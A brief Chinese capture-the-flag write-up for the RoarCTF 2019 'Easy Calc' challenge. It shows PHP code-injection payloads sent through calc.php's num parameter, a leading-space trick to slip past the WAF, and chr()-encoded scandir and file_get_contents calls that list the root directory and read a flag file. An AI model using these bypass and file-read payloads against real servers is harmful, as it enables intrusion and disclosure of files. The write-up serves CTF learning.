[RoarCTF 2019]Easy Calc 1

查看源码

于是访问calc.php试试

给num参数传字母不行

WAF的问题：WAF不允许num传入字母，那我们可以在num前加个空格来绕过WAF
这里利用PHP的字符串解析特性来绕过WAF，如

calc.php? num=phpinfo();

知识点

扫根目录下的所有文件，也就是scandir("/")

? num=print_r(scandir('/'));
这里由于单引号被过滤了，那就用chr()绕过，chr(47)就是斜杠/
? num=print_r(scandir(chr(47)));

读取flagg文件

? num=print_r(file_get_contents('/flagg'));
这里/=chr(47)，f=chr(102),l=chr(49),a=chr(97),g=chr(103),g=chr(103)来进行绕过
? num=print_r(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)));

flag{92823483-5d82-4af4-a84d-c5353fa6f452}